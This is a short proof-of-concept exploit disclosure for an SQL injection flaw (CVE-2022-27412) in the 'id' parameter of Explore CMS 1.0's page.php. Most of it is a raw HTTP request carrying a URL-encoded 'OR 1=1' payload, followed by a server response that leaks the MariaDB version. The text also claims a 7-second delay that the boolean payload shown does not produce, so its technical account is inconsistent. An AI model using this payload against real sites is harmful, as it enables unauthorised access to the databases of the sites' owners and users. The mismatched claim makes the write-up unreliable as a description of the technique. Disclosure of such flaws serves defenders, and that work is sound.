Explore CMS 1.0 Exploit, SQL Injection

# Exploit Title: Explore CMS 1.0 - SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: CVE-2022-27412

# POC

# SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.

#Steps to reproduce

Following URL is vulnerable to SQL Injection in the 'id' field.

GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: REDACTED
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36


HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding

10.3.34-MariaDB

Server accepts the payload and the response get delayed by 7 seconds.

All rights reserved nPulse.net 2009 - 2022
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD